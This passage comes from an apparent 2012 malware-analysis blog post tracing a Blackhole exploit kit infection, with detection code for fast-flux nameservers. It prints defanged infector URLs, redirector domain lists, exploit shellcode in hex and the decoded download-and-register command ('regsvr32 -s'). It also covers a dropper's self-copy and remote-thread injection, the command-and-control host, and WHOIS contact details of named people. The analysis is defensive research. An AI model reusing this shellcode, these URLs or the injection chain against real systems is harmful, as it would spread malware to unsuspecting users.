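ANSWER_RE = re.compile(r'^\s*(\S+)\s+\[([^\]]+)\]\s+\((\d{1,3}(?:\.\d{1,3}){3})\)', re.MULTILINE)


def ns_addresses(trace_text):
    """dnstracer answer lines -> {ns_name: set(ip)}."""
    seen = defaultdict(set)
    for name, _zone, ip in ANSWER_RE.findall(trace_text):
        seen[name].add(ip)
    return dict(seen)


def flux_report(observed, whois, min_distinct=2):
    """Distinct-address count per NS, names at or above min_distinct, addresses reused
    under several NS names, and NS names whose registered address was never observed."""
    distinct = {ns: len(ips) for ns, ips in observed.items()}
    ip_owners = defaultdict(set)
    for ns, ips in observed.items():
        for ip in ips:
            ip_owners[ip].add(ns)
    return {
        'distinct': distinct,
        'fluxing': sorted(ns for ns, n in distinct.items() if n >= min_distinct),
        'shared_ips': sorted(ip for ip, owners in ip_owners.items() if len(owners) > 1),
        'registry_mismatch': sorted(ns for ns, ip in whois.items() if ip not in observed.get(ns, set())),
    }


if __name__ == '__main__':
    report = flux_report(ns_addresses(TRACE_ANSWERS), WHOIS_NS)
    for key, value in report.items():
        print('%-18s %s' % (key + ':', value))
```

Within this single trace every NS name already resolved to four or five different addresses, several addresses serve under more than one NS name, and not one registered nserver address was ever returned; a normal hosting setup would show one stable address per name.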
This infected URL was uploaded to urlquery here--->>[CLICK], and currently qaqipwel.ru has only weak detection in blacklists.

Conclusion: such professional malicious redirector providers currently exist. The domain names below are the ones used for this evil purpose:
nujqamdi.ru axbuzyg.ru aldiplil.ru uqnymtyq.ru bawodnes.ru gezahcyg.ru cilcenok.ru vecvycte.ru irroxux.ru unxajen.ru meewxib.ru deqbyyq.ru byxkauv.ru qovizki.ru huenhaz.eu kykufep.ru luxypuj.eu (↑ domains detected up to the time of writing)
The filename variations "count$.php" detected so far are:
count4.php count5.php count6.php count11.php count12.php count13.php count14.php count15.php count16.php count17.php count18.php count19.php count20.php count21.php count25.php (↑ landing page names detected up to the time of writing)
The domain names change and the IP addresses are pseudo/dynamically changed. We cannot depend on blacklists anymore to nail this kind of infector.

Saturday, 15 September 2012

Well, currently #MalwareMustDie is in hunting mode, so I joined the event. This is actually a report of the first case in hand, which is becoming an important matter in the investigation of BHEK.

I received a report of an infection and, after looking at a squid log, I found the source, which is 203.91.113.6 and is "suspected" of serving Blackhole. Why I quote that word is because I am about 95% sure of it.

Just arrived home from a 6-hour driving trip; after setting up FreeBSD for analysis mode with privoxy and tor, I am aiming at the IP I mentioned previously. The URL reported in the squid log doesn't seem to exist anymore; it looks like the parameter was changed. It was:
h00p://bode-sales.net/w.php?f=9e4b3&e=2

I tried to combine the latest possible Blackhole parameters and finally managed to download the URL below (via tor only..):
--21:26:28-- h00p://bode-sales.net/main.php?page=3c23940fb7350489
=> `main.php@page=3c23940fb7350489'
Resolving localhost (localhost)... 127.0.0.1, ::1
Connecting to localhost (localhost)|::1|:8118... connected.
Resolving bode-sales.net... 203.91.113.6
Connecting to bode-sales.net|203.91.113.6|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
[ <=> ] 68,856 40.80K/s
21:26:32 (40.74 KB/s) - `main.php' saved [68856]

GET /main.php?page=3c23940fb7350489 HTTP/1.0
User-Agent: MalwareMustDieDieDieee/666.666.666
Accept: */*
Host: bode-sales.net
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/1.3.3
Date: Sat, 15 Sep 2012 12:11:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.14

....(blah)

The file itself is the obvious BHEK landing page with obfuscated JS code;
for research purposes I neutralized it here:-->>[PASTEBIN]
And after deobfuscating it I found the Plugin Detection of Blackhole,
which, also for research purposes, I neutralized here:-->>[PASTEBIN]

The first time I checked this landing page on Virus Total the detection was ZERO; now:
MD5: 88ebe56bca027174ab28406ddbafa2e6
File size: 67.2 KB ( 68856 bytes )
File name: main.php
File type: HTML
Detection: 4 / 42
Analysis date: 2012-09-15 17:09:47 UTC ( 0 分 ago )
URL: ---------->>[VIRUS-TOTAL]

Malware Name:
McAfee : JS/Exploit-Blacole.gq
Symantec : Trojan.Malscript
McAfee-GW-Edition : JS/Exploit-Blacole.gq
Kaspersky : Trojan-Downloader.JS.Expack.adl

Like the one previously reported in this blog-->[HERE], basically the exploit vector
of the plugin detect is unchanged,
and in our case now we have 6 (six) exploitations.
(The details are exactly as reported beforehand.)
1. Java Object CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA (Gam.jar)-->[VT:1/9]
2. PDF File AcroPDF.PDF
3. DOMDocs Msxml2.XMLHTTP
4. Java Exploit javaplugin.191_40
5. Java webStart exploit JavaWebStart.isInstalled
*) I thought this time it was without the SWF Exploit infector;
a friend advised me and then I realized there is a
6. SWF Exploit (field.swf)-->[VT:20/42]

However we have slight changes in the shellcode.
I am a big fan of shellzer, a PyDbg based shellcode decoder, and
use it often in many of my projects.
We have a problem figuring out this blog's shellcode using shellzer.
So I cracked it manually; if some of you have the same problem,
I am sharing this howto as a reference:

The above infector exploit has the mission
to execute the below shellcode:
41 41 41 41 66 83 e4 fc fc eb 1O 58 31 c9 66 81
e9 56 fe 8O 3O 28 4O e2 fa eb O5 e8 eb ff ff ff
ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3
58 34 7e a3 5e 2O 1b f3 4e a3 76 14 2b 5c 1b O4
a9 c6 3d 38 d7 d7 9O a3 68 18 eb 6e 11 2e 5d d3
af 1c Oc ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3
5c 1d 5O 2b dd 7e a3 5e O8 2b dd 1b e1 61 69 d4
85 2b ed 1b f3 27 96 38 1O da 5c 2O e9 e3 25 2b
f2 68 c3 d9 13 37 5d ce 76 a3 76 Oc 2b f5 4e a3
24 63 a5 6e c4 d7 7c Oc 24 a3 fO 2b f5 a3 2c a3
2b ed 83 76 71 eb c3 7b 85 a3 4O O8 a8 55 24 1b
5c 2b be c3 db a3 4O 2O a3 df 42 2d 71 cO bO d7
d7 d7 ca d1 cO 28 28 28 28 7O 78 42 68 4O d7 28
28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d
d7 cb 4O 47 46 28 28 4O 5d 5a 44 45 7c d7 3e ab
ec 2O a3 cO cO 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c
29 28 28 a5 74 Oc 24 ef 2c Oc 5a 4d 4f 5b ef 6c
Oc 2c 5e 5a 1b 1a ef 6c Oc 2O O8 O5 5b O8 7b 4O
dO 28 28 28 d7 7e 24 a3 cO 1b e1 79 ef 6c 35 28
5f 58 4a 5c ef 6c 35 2d O6 4c 44 44 ee 6c 35 21
28 71 a2 e9 2c 18 aO 6c 35 2c 69 79 42 28 42 28
7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e
2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3
3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42
d6 d7 7e 2O cO b4 d6 d7 d7 a6 66 26 c4 bO d6 a2
26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 O7
58 4O 5c 5c 58 12 O7 O7 4a 47 4c 4d O5 5b 49 44
4d 5b O6 46 4d 5c O7 5f O6 58 4O 58 17 4e 15 1d
1e 4b 1f 49 Oe 4d 15 19 28 28
*) PS: the above↑shellcode is neutralized

FYI, shellzer hangs if you paste this code. I am not going into
the debugging details on WHY it hangs; let's focus on the
point and solve the code..

Let's dump all of the strings first; you'll get something like this:
iiiiN
..u4._3
d.@0.@
f.^<
t3,..
u..4$..uQ..LQV.u<.t5x
.V.v
@..;
u.^.^$
K.F.
....h
.......XPj@h
...P.
PU...^
.hon..hurlmT
...a
.r..
...\$
AQj.j.SWj.
j...
?.u.G
/p\X...JGLM.「IDM「.FM\._.X@X.N...K.I.M..((((

We won't know what this is all about except for the look of an obfuscated URL
in the last line, so I scanned it to get the below signatures & info..
msf.fnstenv_mov: D9EED97424F45B817313
msf.jmp_call_additive: EB0C5E56311EAD01C3
msf.noupper: EB195E8BFE83C7008BD7
msf.shikata_ga_nai: DAD729C9B15AD97424F4
msf.single_static_bit: EB655E31ED83E10183E301
msf.countdown: FFC15E304C0E07E2FA
msf.call4_dw: FFC05E81760E
CCCCCC.xor: 434343434343EB0F5B33C966B9
77efe4.xor: 304500454975F9EB00
CCCC_INC_EBX_Slide: 43434343
XXXX_pop_eax_start: 58585858
7_push_PSQRVWU: 505351525657559CE8
push_user32: 68333200006855736572
push_urlmon: 686F6E00006875726C6D
push_shell32: 686C333200687368656C
edi_seh_k32: 33FF64FF37648927FF07EBE8
peb_k32: 64A1300000008B400C8B701C
hasher.ror7: 3AD67408C1CB0703DA40
E9Eb.hasher.rol3xor: C1C20332104080380075F5
didier.hll.template: 8945F868FA8B340068884E0D00E8080000008945FC

By this I guessed that API methods of urlmon.dll, and others,
were used in the code.. but couldn't detect any kernel32.dll API yet..
Let's skip it for a while.. Now it is time to bruteforce (bf) the code;
you can use any tools available and try some bf logic! :-)
Shortly, I got these interesting strings and fixed them:
h00p://bode-sales.net/w.php?f=56c7a&e=1
$regsvr32 -s $hwpbt$i.dll
*) where further $h leads to temp dir strings &
$i leads to null values, so I put 0 in it.
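The bruteforce step above, as an added example that is not code from the original post: try all 256 single-byte XOR keys against a blob and keep the keys whose plaintext exposes a URL or DLL string. The blob is constructed here (a placeholder URL, not the real infector URL) and encoded with key 0x28, which is what the decoder stub at the top of the dump (8O 3O 28, i.e. 80 30 28 = xor byte [eax], 0x28) reads as; the brute force itself does not assume that key.

```python
# Added example, not from the original post: single-byte XOR brute force of
# the kind used above to pull the download URL and the regsvr32 command out
# of the BHEK shellcode. The blob is constructed: a placeholder payload
# string encoded with key 0x28, the key the decoder stub in the dump
# ("8O 3O 28" = 80 30 28 = xor byte [eax], 0x28) reads as.
PRINTABLE = set(range(0x20, 0x7F))   # space .. '~'
MIN_RUN = 8                          # shortest run worth reporting
MARKERS = (b"http", b"://", b".dll", b"regsvr32", b"urlmon")


def printable_runs(data: bytes, min_run: int = MIN_RUN) -> list:
    """Return printable ASCII runs of at least min_run bytes, like `strings`."""
    runs, cur = [], bytearray()
    for b in data + b"\x00":         # trailing sentinel flushes the last run
        if b in PRINTABLE:
            cur.append(b)
            continue
        if len(cur) >= min_run:
            runs.append(cur.decode("ascii"))
        cur = bytearray()
    return runs


def xor_bruteforce(blob: bytes) -> dict:
    """Try every single-byte key; keep keys whose plaintext shows a marker.
    Returns {key: [printable runs]} so each candidate can be eyeballed."""
    hits = {}
    for key in range(256):
        plain = bytes(b ^ key for b in blob)
        if any(m in plain for m in MARKERS):
            hits[key] = printable_runs(plain)
    return hits


# Constructed sample of what the shellcode's data area could hold, XOR'ed
# with 0x28. The URL is a placeholder, not the infector URL from the post.
SAMPLE_PLAIN = (b"\x90\x90http://example.invalid/w.php?f=PLACEHOLDER&e=1\x00"
                b"regsvr32 -s %Temp%wpbt0.dll\x00urlmon\x00")
SAMPLE_BLOB = bytes(b ^ 0x28 for b in SAMPLE_PLAIN)

if __name__ == "__main__":
    for key, runs in sorted(xor_bruteforce(SAMPLE_BLOB).items()):
        print(f"key 0x{key:02x}: {runs}")
```

On real shellcode the decoder is usually more than one byte of key, so treat a hit as a starting point and confirm it against the decoder stub.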

The story is urlmon.dll is being called to download the
malicious file from "h00p://bode-sales.net/w.php?f=56c7a&e=1",
save it as %Temp%wpbt0.dll, execute it, and register it with the "regsvr32 -s"
command on your PC. Looks like we have slight changes in the shellcode
API for the usage of calls from non-kernel32.dll libraries.
This is a different point compared to the previous BHEK shellcode.
So let's see what payload it is (using tor) and save it as the malware
scheme wanted it:
--2012-09-15 20:47:08-- h00p://bode-sales.net/w.php?f=56c7a
Resolving localhost (localhost)... 127.0.0.1, ::1
Connecting to localhost (localhost)|::1|:8118... connected.
Proxy request sent, awaiting response... 200 OK
Length: 143207 (140K) [application/x-msdownload]
Saving to: `wpbt0.dll'
100%[======>] 143,207 44.5K/s in 3.1s
2012-09-15 20:47:13 (44.5 KB/s) - `wpbt0.dll' saved [143207/143207]

It is a PE binary with the below analysis:
Hexdump of the first sector:
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 05 00 60 1C 53 50 00 00 00 00 PE..L...`.SP....
0090 00 00 00 00 E0 00 0F 01 0B 01 01 32 00 EC 00 00 ...........2....
00A0 00 42 00 00 00 00 00 00 00 10 00 00 00 10 00 00 .B..............
00B0 00 10 01 00 00 00 40 00 00 10 00 00 00 02 00 00 ......@.........
00C0 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 ................

↑Quick reversing it...to seek some clue..
[0x00000000:0x00400000]> d
0x00000000 (01) 4d DEC EBP
0x00000001 (01) 5a POP EDX
0x00000002 (01) 90 NOP
0x00000003 (02) 0003 ADD [EBX], AL
0x00000005 (02) 0000 ADD [EAX], AL
0x00000007 (03) 000400 ADD [EAX+EAX], AL
0x0000000a (02) 0000 ADD [EAX], AL
0x0000000c (01) ff DB 0xff
0x0000000d (02) ff00 INC DWORD [EAX]
0x0000000f (06) 00b8 00000000 ADD [EAX+0x0], BH
0x00000015 (02) 0000 ADD [EAX], AL
0x00000017 (03) 0040 00 ADD [EAX+0x0], AL
: :
----- tastes like a packer trace.. -----
0x00000034 (02) 0000 ADD [EAX], AL
0x00000036 (02) 0000 ADD [EAX], AL
0x00000038 (02) 0000 ADD [EAX], AL
0x0000003a (02) 0000 ADD [EAX], AL
0x0000003c (03) 8000 00 ADD BYTE [EAX], 0x0
0x0000003f (02) 000e ADD [ESI], CL
0x00000041 (01) 1f POP DS
0x00000042 (05) ba 0e00b409 MOV EDX, 0x9b4000e
0x00000047 (02) cd 21 INT 0x21
0x00000049 (05) b8 014ccd21 MOV EAX, 0x21cd4c01
0x0000004e (01) 54 PUSH ESP
0x0000004f (05) 68 69732070 PUSH 0x70207369
0x00000054 (02) 72 6f JB 0x000000c5 ; 1
: :
PE Summary
Entry Point: 0x1000 at section: .code
CRC Fail: Claimed: 0 Actual: 185076
Compile Time: 0x50531C60 [Fri Sep 14 12:00:32 2012 UTC] <== NEW!
Packer: PureBasic 4.x -> Neil Hodgson
Compiler: Microsoft Visual C++ 5/6
Sections:
.code 0x1000 0x2775 10240
.teXT 0x4000 0xc335 50176
.rdata 0x11000 0x1a0f 7168
.data 0x13000 0x1218 2560
.rsrc 0x15000 0x115c 4608

Auto reverse the first block and ...got the loops :-P
[0x401000L] push 0x0
[0x401005L] push 0x413998
[0x40100aL] call 0x404070L
[0x40100fL] add esp 0xc
[0x401014L] push 0x0
:
loop
:
[0x401677L] call 0x4021b7L //a h*ll of a looper...anti-reverse trap, patch it!
[0x40167aL] fstp st0
[0x40167fL] fild [0x413a08]
[0x401681L] fmul [0x413040]
[0x401687L] sub esp 0x4
[0x40168dL] fstp [esp]

Calls:
Complete calls listed here:--->>[PASTEBIN]
With the calls summary as below:
Get system env, opening/exec files (by original C code),
opening thread, using timer, bitmap object manipulation,
GUI operations, using winsock, creation of TLS, creation of semaphores

↑OK, looks strange enough; let's reverse it well. I used radare2.
You can use anything you like; if you reverse it correctly
you'll find the below malicious API calls inside of the
packed parts of the sample (tip: unpack it first):
CopyFileW
(lpExistingFileName: "%Temp%wpbt0.dll",
lpNewFileName: "%ApData%\KB00725031.exe",
bFailIfExists: 0x0)

CreateRemoteThread
(hProcess: 0x68,
lpThreadAttributes: 0x0,
dwStackSize: 0x0,
lpStartAddress: 0x12032f0,
lpParameter: 0x1200000,
dwCreationFlags: 0x0,
lpThreadId: 0x0)

So we have a self-copy operation and foreign memory injection here.
Yes, let's use a sandbox to quickly confirm it:
Malicious Processes
1960 c:\test\sample.exe (wpbt0.dll)
328 c:\documents and settings\user\application data\kb00725031.exe

Yes, it dropped the malicious file kb00725031.exe - and somehow I remembered
this filename from a while ago. I searched & found it here --->>[LINK]
(It will be another story of long history for the details of this drop.)
Let's continue.
Virus Total showed this detection when I found the payload the 1st time:
AntiVir : TR/Buzus.HT.11
AhnLab-V3 : Trojan/Win32.Jorik
Sophos : Mal/EncPk-AFN
Emsisoft : Trojan.Win32.Jorik.Foreign.AMN!A2
Kaspersky : Trojan.Win32.Jorik.Foreign.aa
Microsoft : VirTool:Win32/CeeInject.gen!HT
Comodo : UnclassifiedMalware

Now it is becoming:
MD5: a70da3ce151ac0eb46e3a0d959cd0af3
File size: 139.9 KB ( 143207 bytes )
File name: wpbt0.dll
File type: Win32 EXE
Detection : 9 / 41
Analysis date: 2012-09-15 16:21:04 UTC ( 0 分 ago )
URL:-------->>>[CLICK/VIRUS-TOTAL]
Malware Name:
VIPRE : Trojan.Win32.Generic!BT (NEW)
AntiVir : TR/Buzus.HT.11 (NEW)
AhnLab-V3 : Trojan/Win32.Jorik
ESET-NOD32 : a variant of Win32/Injector.WNM (NEW)
Sophos : Mal/EncPk-AFN
Microsoft : VirTool:Win32/CeeInject.gen!HT
Symantec : Trojan.ADH.2 (NEW)
Emsisoft : Trojan.Win32.Jorik.Foreign.AMN!A2
Comodo : UnclassifiedMalware

Well, it is supposed to connect to the internet, so let's carefully run it a bit :-)
Well, it works as expected, & starts to communicate to the mothership -
in 146.185.220.34! Below is my record of the UDP traffic:
Req:
00000000 00 02 01 00 00 01 00 00 00 00 00 00 13 74 75 6e ........ .....tun
00000010 69 6e 67 6c 61 6d 62 6f 73 67 6c 61 6d 6f 75 72 inglambo sglamour
00000020 02 72 75 00 00 01 00 01 .ru.....

Ans:
00000000 00 02 81 80 00 01 00 01 00 00 00 00 13 74 75 6e ........ .....tun
00000010 69 6e 67 6c 61 6d 62 6f 73 67 6c 61 6d 6f 75 72 inglambo sglamour
00000020 02 72 75 00 00 01 00 01 c0 0c 00 01 00 01 00 00 .ru..... ........
00000030 0e 0f 00 04 92 b9 dc 22 ......."

Yes, it asked for
tuninglambosglamour.ru IN A // 146.185.220.34
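The DNS exchange above, parsed programmatically as an added example that is not code from the original post: the packet bytes are the ones in the "Ans:" dump, and the parser follows the c0 0c compression pointer to recover the name, TTL and A record instead of reading them off the hex by eye.

```python
# Added example, not from the original post: minimal parser for the DNS answer
# captured above, pulling the C2 name's resolution out of a UDP packet dump.
# Handles the question section, IN A records and the label-compression
# pointer ("c0 0c" in the answer), which is all this capture needs.
import struct


def read_name(pkt: bytes, off: int):
    """Decode the name at off, following pointers; returns (name, end offset)."""
    labels, end, jumped = [], off, False
    while True:
        length = pkt[off]
        if length & 0xC0 == 0xC0:              # 2-byte pointer to an earlier name
            if not jumped:
                end = off + 2
            off = struct.unpack("!H", pkt[off:off + 2])[0] & 0x3FFF
            jumped = True
            continue
        if length == 0:                        # root label terminates the name
            return ".".join(labels), (end if jumped else off + 1)
        off += 1
        labels.append(pkt[off:off + length].decode("ascii"))
        off += length


def parse_a_answers(pkt: bytes) -> list:
    """Return [(name, ttl, ip)] for every IN A record in the answer section."""
    _id, flags, qdcount, ancount, _ns, _ar = struct.unpack("!6H", pkt[:12])
    if not flags & 0x8000:
        raise ValueError("not a DNS response (QR bit clear)")
    off = 12
    for _ in range(qdcount):                   # skip the question(s)
        _, off = read_name(pkt, off)
        off += 4                               # qtype + qclass
    records = []
    for _ in range(ancount):
        name, off = read_name(pkt, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        if rtype == 1 and rclass == 1 and rdlen == 4:
            records.append((name, ttl, ".".join(str(b) for b in pkt[off:off + 4])))
        off += rdlen
    return records


# The "Ans:" bytes exactly as dumped in the post.
ANS = bytes.fromhex(
    "00 02 81 80 00 01 00 01 00 00 00 00 13 74 75 6e"
    "69 6e 67 6c 61 6d 62 6f 73 67 6c 61 6d 6f 75 72"
    "02 72 75 00 00 01 00 01 c0 0c 00 01 00 01 00 00"
    "0e 0f 00 04 92 b9 dc 22")

if __name__ == "__main__":
    print(parse_a_answers(ANS))
```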

I bet it does some more malicious stuff as per the referred analysis above.

By the way, the network info of the mothership:
inetnum: 146.185.220.0 - 146.185.220.255
netname: mdsru-net
descr: MDS LTD.
country: RU
org: ORG-Ml192-RIPE
admin-c: AV6782-RIPE
tech-c: VA2854-RIPE
status: ASSIGNED PA
mnt-by: mdsru-mnt
source: RIPE # Filtered

organisation: ORG-Ml192-RIPE
org-name: MDS ltd.
org-type: OTHER
abuse-mailbox: info@mdsnet.org
address: Sofia Kovalevsaja st. 22
address: 620242 Ekaterinburg
address: Russian Federation
mnt-ref: mdsru-mnt
admin-c: AV6782-RIPE
mnt-by: mdsru-mnt
source: RIPE # Filtered

person: Andrey Voronov
address: 1st Magistralny blind alley
address: 24, BC "The Yard"
address: Moskow
abuse-mailbox: info@mdsnet.org
address: Russian Federation
phone: +74957392422
nic-hdl: AV6782-RIPE
mnt-by: mdsru-mnt
source: RIPE # Filtered

person: Vlad Abramov
address: 1st Magistralny blind alley
address: 24, BC "The Yard"
address: Moskow
abuse-mailbox: info@mdsnet.org
address: Russia
phone: +74957392422
nic-hdl: VA2854-RIPE
mnt-by: mdsru-mnt
source: RIPE # Filtered

While the landing page is in this network:
inetnum: 203.91.112.0 - 203.91.119.255
netname: G-Mobile
descr: G-Mobile, Baga-Toiruu 3/9, Chingeltei district-1,
descr: Ulaanbaatar 211213, Mongolia
country: MN
admin-c: TG154-AP
tech-c: TG154-AP

route: 203.91.113.0/24
descr: G-Mobile Subnet
origin: AS24559
mnt-by: MAINT-MN-WIRELESSCOM
changed: tulga@g-mobile.mn 20090205
source: APNIC

person: Tulga Gandavaa
nic-hdl: TG154-AP
e-mail: tulga@g-mobile.mn
address: G-Mobile Corporation,
address: Chingeltei district 1st khoroo, Baga toiruu - 3/9
address: Ulaanbaatar, Mongolia
phone: +976-98101111
fax-no: +976-11-311195
country: MN
changed: tulga@g-mobile.mn 20070111
mnt-by: MAINT-MN-G-MOBILE


↑There are four more domains hosted on the same IP; there will be variations -
of possibilities for spam links to this infector.

This case's malware family photograph:

Conclusion:

The moral of this story is, the shellcode format of BHEK is starting to change.
The usual kernel32.dll API based calls are becoming undetected, yet it
downloaded the dropper binary containing the copy API now.
It is a slight modification but it successfully fools some
automation schemes. Further investigation made me realize the reason,
which is written in "Bypassing Export address table Address Filter (EAF)",
which can be viewed--->>[HERE]
And additionally a friend advised me of the crash PoC of it here -->>[HERE]

Maybe shellzer must be patched for handling this new type of shellcode.
I must say, maybe I missed something, since most of the reversing was done manually,
so please forgive me for it and please advise me in the comment area.

I think some other changes in BHEK distribution are on the run too.
Let's keep our eyes stuck to it and see what happens.
BTW, the infected urls are all up and alive, so please be careful with them.
Malware MUST Die!!